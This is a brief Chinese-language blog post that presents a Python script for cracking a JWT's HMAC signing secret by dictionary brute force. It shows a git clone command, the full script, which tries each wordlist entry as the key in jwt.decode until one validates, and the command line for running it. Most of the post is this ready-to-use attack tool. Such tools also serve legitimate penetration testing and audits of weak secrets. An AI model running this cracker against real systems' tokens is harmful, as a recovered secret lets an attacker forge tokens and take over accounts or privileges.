前言
JWT签名秘密暴力破解
下载项目
1 2
| git clone https://github.com/Feiju12138/crack_jwt_signature_secret.git cd crack_jwt_signature_secret
|
源代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28
| import sys
import jwt
if __name__ == '__main__': if len(sys.argv) != 4: print("Usage: python3 crack_jwt_signature_secret.py dict.txt xxx.xxx.xxx HS256") quit()
dict = sys.argv[1] arg = sys.argv[2] algorithms = sys.argv[3]
f = open(dict) line_list = f.readlines() for line in line_list: try: jwt.decode(arg, verify=True, key=line.strip(), algorithms=algorithms) f.close() print(f"found success: {line}") quit() except (jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError, jwt.exceptions.InvalidSignatureError) as e: continue except Exception as e: print(f"err: {e}") break f.close() print(f"found failed")
|
下载依赖
暴力破解
dict.txt
:指定字典
xxx.xxx.xxx
:JWT
HS256
:加密方式
1
| python3 crack_jwt_signature_secret.py dict.txt xxx.xxx.xxx HS256
|
完成
参考文献
哔哩哔哩——逆风微笑的代码狗
CSDN——1024小神